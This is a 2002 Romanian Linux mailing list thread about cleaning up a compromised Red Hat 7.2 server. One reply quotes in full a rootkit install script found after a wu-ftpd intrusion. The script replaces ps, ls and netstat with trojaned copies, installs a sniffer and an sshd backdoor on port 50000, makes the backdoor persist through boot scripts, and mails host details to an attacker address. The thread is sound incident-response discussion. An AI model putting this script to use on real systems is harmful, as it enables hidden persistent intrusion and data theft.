cel cu [EMAIL PROTECTED] l-am avut si eu la un client On Sat, 25 May 2002, Gushterul wrote:
> Hello paul, > > Un lucru tot e bun. Ca mi-ai zis adresa de mail. Care mai are > rootkituri sariti cu emailurile unde se duc info despre server. Asha > mai scapam de ei oleak:) > > Gushterul > P.S. Hapropo ce-ar fi o pagina de web cu toti? Nu sa punem rk acolo ci > info sha shthie homu' lha khare sha hai dhea in khap. Reformulez cine > face hosting? :) > > Friday, May 24, 2002, 11:38:02 PM, you wrote: > > pzeur> Reinstall tot dupa care te inregistrezi cu rhn_register la rh network si > pzeur> dupa ce ai inscris sitemul tau la ei poti folosi "up2date -u" pentru > pzeur> update-uri la zi. Seamana a wingoz dar merge bine. > pzeur> Daca ai probleme cu conexiunea il lasi sa aduca headerele, pe care le > pzeur> pune in /var/spool/up2date, (ai de downloadat vreo 200 mb de updateuri) > pzeur> cauta un mirror apropiat la updates.redhat.com (ex: ftp.ubbcluj.ro) aduci > pzeur> de acolo pachetele corespunzatoare headerelor pe care le pui in > pzeur> /var/spool/up2date si repornesti "up2date -u". > > > pzeur> si mie mi-a gaurit wu-ftpd-u din rh7.2 dar rootkitu era pentru alt sistem > pzeur> asa ca l-am gasit dupa vreo 3 ore (asteptam sa se termine "up2date -u" cu > pzeur> serviciile pornite de bou ce am fost:) cind ps, ls , netstat nu mergeau. > pzeur> asa ca am adus repede respectivele app de pe alt sistem, si surpriza... > pzeur> nfsd -q -p 50000 care era un sshd modificat. m-am uitat prin directoare > pzeur> si am gasit in /var/ftp/ un director care nu era acolo ultima data cind m-am > pzeur> uitat. Cautind prin fisierele din el dau de o cale la ceva director de > pzeur> librarii unde era cam asa ceva: > pzeur> . > pzeur> .. > pzeur> .lib > pzeur> .tooz > > pzeur> in .tooz era fisierul install: > pzeur> #private version from cur / not hacked by lamme assz as Em|nem or others! > pzeur> #phear my reverge all u mother fuckers > pzeur> # rk made ONLY 4 my friends ond ONLY 4 fun > pzeur> #!/bin/sh > pzeur> unset HISTFILE > pzeur> chattr -iau /usr/src/linux/arch/alpha/lib/.lib/ > pzeur> chattr -iau /bin/ps > pzeur> chattr -iau /bin/ls > pzeur> chattr -iau /bin/netstat > pzeur> chattr -iau /bin/lpd > pzeur> rm -rf /etc/ssh* > pzeur> clear > pzeur> mkdir -p /usr/src/linux/arch/alpha/lib/.lib > sh sysinfo1 >> new-host > pzeur> sh ssh_random_key > pzeur> mv .1proc /usr/src/linux/arch/alpha/lib/.lib/ > pzeur> mv .1addr /usr/src/linux/arch/alpha/lib/.lib/ > pzeur> mv .1file /usr/src/linux/arch/alpha/lib/.lib/ > pzeur> mv /bin/ps /usr/src/linux/arch/alpha/lib/.lib/.ps > pzeur> mv /bin/ls /usr/src/linux/arch/alpha/lib/.lib/.ls > pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1proc > pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1addr > pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1file > pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.ps > pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.ls > pzeur> mv ps /bin/ps > pzeur> mv ls /bin/ls > pzeur> mv /bin/netstat /usr/src/linux/arch/alpha/lib/.lib/ > pzeur> mv netstat /bin/netstat > pzeur> chown root.root /bin/ls > pzeur> chown root.root /bin/ps > pzeur> chown root.root /bin/netstat > pzeur> mv linsniffer /bin/lpd > pzeur> rm -rf /etc/ssh* > pzeur> rm -rf /usr/man/man8/rpc.rstatd.8 > pzeur> rm -rf /usr/sbin/rpc.rstatd > pzeur> rm -rf /usr/sbin/rpc* > pzeur> lpd & > pzeur> ./lpd > pzeur> mv sshd /bin/nfsd > pzeur> mv -f sshd_config /etc/ > pzeur> mv -f ssh_host_key /etc/ > pzeur> mv -f ssh_random_seed /etc/ > pzeur> mv -f ssh_host_key.pub /etc/ > pzeur> rm -rf ssh_random_key > pzeur> chattr +iau /bin/nfsd > pzeur> chattr +iau /etc/sshd_config > pzeur> chattr +iau /etc/ssh_host_key > pzeur> chattr +iau /etc/ssh_random_seed > pzeur> chattr +iau /etc/ssh_host_key.pub > pzeur> nfsd -q -p 50000 > pzeur> echo "nfsd -q -p 50000" >>/etc/rc.d/rc.sysinit > pzeur> echo "nfsd -q -p 50000" >>/etc/rc.d/init.d/inet > ./sysinfo1 >> new-host |mail -s "root6666" [EMAIL PROTECTED] > pzeur> cat new-host |mail -s > pzeur> #-----done with ssh---- > pzeur> killall -9 portmap > pzeur> killall rpc.statd > pzeur> rm -f /usr/sbin/rpc.statd > echo "ftp">>>/etc/ftpusers > echo "root">>>/etc/ftpusers > pzeur> cat /proc/cpuinfo > pzeur> mv pwd /dev/capi20.20 > pzeur> rm -f sysinfo1 > pzeur> rm -f sysinfo > pzeur> rm -f new-host > pzeur> rm -f sshd > pzeur> cd .. > pzeur> rm -rf s.tgz > pzeur> clear > pzeur> echo "****************************7.1***************************" > pzeur> echo "Oki" > pzeur> echo "***********************SpUrKaTu&TrUnKS********************" > > > pzeur> mai era un fisier .1addr: > pzeur> 2 194.105 > pzeur> 3 6666 > pzeur> 3 6667 > pzeur> 3 54789 > pzeur> 3 31337 > pzeur> 3 6668 > pzeur> 3 6669 > pzeur> 3 6666 > pzeur> 2 194.102.233 > pzeur> 2 209.142.209.161 > pzeur> 2 217.10 > pzeur> 2 213.233 > > > pzeur> am pastrat fisierele ca poate nu se stie niciodata, mai sunt printre ele : > pzeur> hideps install lpd sense string tcp.log utils wipe > pzeur> .1addr .1file .1proc .ls netstat .ps > > pzeur> cam asta ma mai gasit > > pzeur> in general e bine ai copii originale dupa ls, ps, netstat > > pzeur> bafta > > > pzeur> On Fri, 24 May 2002, Gabriel Stoicea wrote: > > >> Rulez un sistem RH 7.2 pe care am depistat o intruziune. > >> Mi-am dat seama de asta pentru ca nu mergeau corect anumite comenzi. > >> 1. Am reparat pachetele compromise (net-tools, fileutils si procps) cu > >> rpm -U --force ... > >> 2. Am download-at chkrootkit si chkproc imi spune ca ruleaza 2 procese > >> ascunse: > >> - You have 1 process hidden for readdir command > >> - You have 1 process hidden for ps command > >> 3. chkrootkit "intepeneste" la verificare la pozitia > >> Checking 'aliens'... > >> 4. Cand rebootez PC-ul imi da niste erori la demontarea partitiei /usr > >> --> Illegal seek > >> 5. Cand bootez imi apar cateva mesaje cum ca un program este shareware > >> si nu stiu ce... si ca asculta pe portul 7000 > >> 6. In boot.log apare linia > >> ... Starting backdoor daemon... Done, pid=... > >> Acum va intreb: > >> - mai pot fi si alte pachete compromise in afara de cele numite? > >> - ce este cu acele procese ascunse si cum scap de ele? > >> - de ce intepeneste chkrootkit? > >> - daca este intr-adevar vorba de backdoor, cum scap de el? > >> > >> Cu speranta ca nu va "sictiresc" cu un mail asa de lung, va multumesc > >> anticipat pentru ajutor. > >> Gaby > >> > >> > >> --- > >> Pentru dezabonare, trimiteti mail la > >> [EMAIL PROTECTED] cu subiectul 'unsubscribe rlug'. > >> REGULI, arhive si alte informatii: http://www.lug.ro/mlist/ > >> > >> > > pzeur> --- > pzeur> Pentru dezabonare, trimiteti mail la > pzeur> [EMAIL PROTECTED] cu subiectul 'unsubscribe rlug'. > pzeur> REGULI, arhive si alte informatii: http://www.lug.ro/mlist/ > > > > -- Nelu Varvas ---------------------------- Tehnical Manager PCNET DATA NETWORK SA - Cluj Str. G.Baritiu Nr 4-6 Et.3 ---------------------------- --- Pentru dezabonare, trimiteti mail la [EMAIL PROTECTED] cu subiectul 'unsubscribe rlug'. REGULI, arhive si alte informatii: http://www.lug.ro/mlist/
